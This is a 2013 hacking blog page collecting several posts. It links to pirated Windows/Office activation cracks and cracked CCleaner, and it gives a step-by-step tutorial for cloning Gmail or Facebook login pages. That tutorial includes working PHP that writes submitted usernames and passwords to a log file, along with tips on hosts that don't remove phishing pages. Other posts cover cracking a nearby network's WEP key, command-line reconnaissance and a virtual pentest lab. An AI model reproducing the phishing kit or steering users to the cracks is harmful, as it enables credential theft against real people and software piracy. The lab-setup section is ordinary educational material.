Saturday, November 30, 2013

Windows 8 Activation Crack (All Versions)

Windows 8 Activation Crack (All Versions)

KMSPico v4.5 is an Offline KMS Activator that emulates a KMS server in the memory of your computer and sends activation data back and forth attempting to activate volume versions of Windows and Office. This is the fastest, safest & easiest way for activating Windows & Office Products.

Activates:



  •     Windows Vista Business/Enterprise/N/VL
  •     Windows 7 Pro/Enterprise/N/VL
  •     Windows 8 Pro/Enterprise/N/VL
  •     Windows Server Std/Data 2008/2008R2/2012
  •     Office/OfficeVL 2010/2013

Retail-Only Versions of windows that MAY NOT activate using Activator are:

  •     Vista Starter/Homebasic/Homepremium/Ultimate
  •     7 Starter/Homebasic/Homepremium/Ultimate
  •     8 core/ProWMC

 Tested : On My PC

Download :   

http://www.4shared.com/rar/ADXfrqug/KMSpico_Activator_v45__fbtghan.html
 





CCleaner Pro 4.01 Full Crack – Download CCleaner 4.01

CCleaner Pro 4.01 Full Crack – CCleaner is the best tool for cleaning, optimization your PC. Download CCleaner Pro 4.01 Full Crack and keeps your computer fit and saves you the time you would spend uncluttering it manually.
CCleaner-Pro-Full-Crack
CCleaner Pro 4.01 Full Crack – Download CCleaner 4.01

CCleaner Pro 4.01 Full Crack – Download CCleaner 4.01

Cookies, temporary files, and various other means of tracking your Web and slow down your computer. CCleaner Pro is one of the better ones for its ease of use and powerful cleaning capabilities.
CCleaner Pro 4.01 Full Crack features a clean, professional-looking interface split into four areas: Cleaner, Registry, Tools and Options. CCleaner Pro 4.01 extra functionality is offered by the Tools section. It includes an uninstall manager, a startup utility, system restore feature and a drive wiper.
Other tweaks of CCleaner Pro 4.01 Full can be performed by accessing the Options panel. Here you can build a list of cookies you wish to keep, as well as set various inclusions / exclusions for the scanning process.
CCleaner Pro 4.01 Full Crack – Download CCleaner 4.01

CCleaner Pro 4.01 Full Crack Cleans the following :

  • Internet Explorer: Temporary File Cache, URL History, Cookies, Last download file location.
  • Firefox: Temporary File Cache, URL History, Cookies, Download manager.
  • Windows : Recycle Bin, Clipboard, Windows Temporary files, Windows Log files, Recent Documents, Run history,DNS Cache, Error Reporting, Windows Memory Dumps and more…
  • Advanced : Menu Order cache, Tray Notifications Cache, Window Size and Location Cache, User Assist history, IIS Log Files, Custom Folders.
  • Third-party applications cleaning and 100% Spyware FREE.
  • In CCleaner Pro 4.01 Pro added cleaning for Adobe Acrobat XI, VSO Blu-ray and DVD Converter Ultimate, Oxygen XML Editor 14 and Connectify Hotspot.

Download CCleaner Pro 4.01 Full Final

CCleaner Pro Homepage
CCleaner Pro 4.01 Full Crack
http://adf.ly/OJpuz

Thursday, November 28, 2013

Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.



For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.



So now u have a hosting account so lets create a fake page-

First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name login.htm .

or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".

Now the second part of the hack-
Go to Notepad and copy this into it-


<?php

header ('Location: http://www.facebook.com');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


replace facebook.com with the URL you want the user to go after he clicks on submit button.

Save the page as fish.php

Now you need to edit the "login.htm" file we saves earlier. So go to that and open it with notepad.
now search for anyhtin like "action=" which has something with login. And replace the URl with "fish.php".

Also create a blank txt file with name "log.txt" . This file would be used to save your logins and passwords.
Now you are done,.

Go to your hosting account and upload all the files to your server.
Now go to the URL provided by ur host.

Like - http://g00glepage.t35.com/login.htm

And you would see the fake page as it is.
Now enter the username and password.

Check the log.txt file. The password and username you enterd previously would be saved in the log.txt  file.

Here you have a working phishing page.

Hacking a WEP key with airodump on Ubuntu

WEP key can easily be cracked with a simple combination of tools on Linux machine. The WEP cracking is made easier by the flaws in the design of the WEP encryption that makes it so vulnerable.



These tools are already inbuilt in the Backtrack linux about which I posted recently. But you can install these hacking tools separately as well on any linux distro.


These steps are made for an Ubuntu machine and uses Debian version which is the format for Ubuntu. Specific version for each each hack tool are available for almost all leading linux versions.

The hack starts-


Install aircrack-ng – on Debian Etch by:

DOWNLOAD aircrack.ng HERE
http://adf.ly/aiZi8


sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:


sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.


A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

Wednesday, November 27, 2013

Network Hacking Using Command Prompt


-: Network Hacking :-


Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com

example:- c:/>ping www.google.com


Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.


Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n



Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21


Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com
example:- c:/>tracert fbtghana.blogspot .com



Here "*    *    *    Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.

various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.

The information obtained by using tracert command can be further used to find out exact operating system running on target system.



Set up your Pen Testing/Hacking Lab Network using a Single System


Contents

  • Introduction
  • Installation & Configuration
  • Installing Applications on Virtual Machine
  • Advantages of Virtual Machine
  • Take Backup & Save Trouble in Future
  • Disable the windows Firewall
  • Testing your Pen-Testing/Hack Network
  • References
  • Conclusion
Introduction

There are lots of tutorials available on the internet related to hacking but the big problem lies in testing your theoretical skills. Unless you don't have practical exposure to hacking, you cannot really understand the strength of it. The technique I will discuss here will be advantageous for those who have only single system and want to set up a testing network using it. In case you have multiple systems then you can easily test for your skills by making one system as target and other as attacker.
But what to do when we have only a single system at our disposal. Need not to worry. Virtual machine is the ultimate solution. You can set up your own hacking network and apply your skills to gain practical exposure to hacking.
Installation & Configuration
The only thing to look for is your systems hardware configuration. You should have minimum 2 GB RAM but it is highly recommended to use 3 GB RAM for a 32 bit operating system.

We will be using Oracle VirtualBox in this tutorial. You can download virtualbox from this link [Reference 1].  Once you have installed Vbox, the next step is to download the Extensions pack. You can get it from this link [Reference 2]

Once you have followed these initial steps, you are half done. The next step is to setup a target operating system. Suppose you want to set WINDOWS XP SP2 as the target operating system. You will need a bootable Windows XP SP2 iso for that. You can easily download it from Microsoft website or torrent. You can refer to this quick video tutorial on how to setup a virtual machine using VBox and WIN XP.
Installing Applications on Virtual Machine

So now you have a virtual machine where you can test all your applications and hacks. Let us install a WAMP server and run DVWA over it. For those who are not aware of DVWA can check this link [Reference 3]

How to install applications on a virtual machine? Well the process is simple. When your Windows XP Virtual machine is running, then click on the DEVICE tab, move to USB and select your pendrive from the list.
Now you can install anything from a USB drive inside your virtual machine. There is also a facility to create shared folder with your host operating system but I would prefer that you use USB. Shared folder has some issues when your host operating system is Windows 7. You can install different servers, applications, RAT clients etc and play with it.
Advantages of Virtual Machine
Here are some of the major advantages of using virtual machine.
  • You can test all the viruses and RATs without any fear as your base operating system will not be affected.
  • You can test different servers and applications easily without affecting your base operating system.
  • In case the Virtual machine gets corrupt then you can re-install it.
Take Backup & Save Trouble in Future
There are also some key factors that you should remember which will help you during your pentesting:
  • Create a clone of the virtual machine
  • This step is very helpful in case your VM gets corrupt. Creating a clone of it will prevent you from re-installing it again and again.
  • You can create a clone by Right clicking on the Virtul machine instance in VBox and click on "clone.."
  • You will notice that a cloned virtual WinXP will be created for you.
Disable the Windows Firewall
The next important thing you can do is disable the windows firewall and then perform your pentesting as the firewall may block some of the suspicious activities. Using the default Windows firewall of XP virtual machine you can also test whether your activity is traceable or not. This will give you a clear understanding why RATs are not considered as a suitable hack these days because they are easily detectable. You can disable the firewall by going to control panel, clicking on Firewall and then disable it.

In this way you can set up a suitable environment for your home experiments.
Testing your Pen-Testing/Hack Network
Well a good question to ask if you have understood the above concepts. So far we discussed how to test different tools and techniques on a virtual operating system. The next step will be how to hack one virtual machine using the other. The scenario will be similar to hacking any system on internet so this technique will give you a real time exposure.

Interesting... Lets proceed then. This time we will set up another virtual machine using BackTrack [Reference 4] operating system which is one of the most widely used penetration testing operating system by security professionals.

The reason which makes Backtrack so popular is:
  • It has all the relevant tools pre-installed
  • It is linux based.
You can download the Backtrack 5 iso from its official website. Its a must have operating system for all. You can follow this simple video to install BT on virtualbox.
DOWNLOAD backtrack HERE
 http://www.backtrack-linux.org/downloads/
 
 
Once you are done with the installation part, the next step is to make the two virtual machines (BT and WinXP) connect with each other. There is a simple setting that you will have to make in both the virtual machines. Let's check it out.

Select the Backtrack virtual machine, then click on settings tab, then move to "network" settings. You will find that "Adapter 1" is set to NAT adapter. Switch to the "Adapter 2" tab.
In the Adapter2 tab, set the adapter as "Host-Only Adapter". Set the name of adapter as "VirtualBox Host Only Ethernet Adapter" . See the figure.
Make similar setting changes in your windows XP virtual machine as well. Now your two virtual machines are ready to connect with each other. You can check the IP address of Windows machine by using the ipconfig command in the command prompt and similarly you can check the IP address of the BT machine using the ifconfig command. Also you can ping the two machines to check if both are detecting each other (don't forget to disable the windows firewall else it will filter the ping data packets).

The following image shows my two virtual machines. One is WinXP and other is BT5 with there corresponding ip addresses. Both are running ovr my host operating system Win7. So in all there are 3 operating systems running simultaneously.
Now you can use various options available in Backtrack OS to perform tests on the WinXP box. Let us quickly perform an nmap scan to check the open ports on WinXP machine.
As you can see that the target is up and has some open ports as well. Similarly you can perform several attacks and use the tools available in Backtrack to penetrate the target windows XP machine without harming your own operating system.

You can use this technique to perform several tests like,
  • You can try to hack different operating systems by installing them as a virtual machine.
  • This will have a real time simulation of original scenario.
  • You can increase the level of difficulty of your hacks by installing firewalls, IDS/IPS etc.
  • This is a self customization scenario where you can do what ever you want
References

  1. VirtualBox - Powerful x86 and AMD64/Intel64 virtualization product
  2. Extension pack for Virtual Box.
  3. Installing and working with DVWA.
  4. BackTrack - Popular Live Security Distribution for Penetration Testing
    Conclusion

    This is just a quick example for you all to get started with using VM's for pentesting and hacking. You can further take this tutorial to next level by experimenting with various flavors of operating systems and try your hands on them.

    This can be like a practice battlefield for you before you dive deep into the real fight.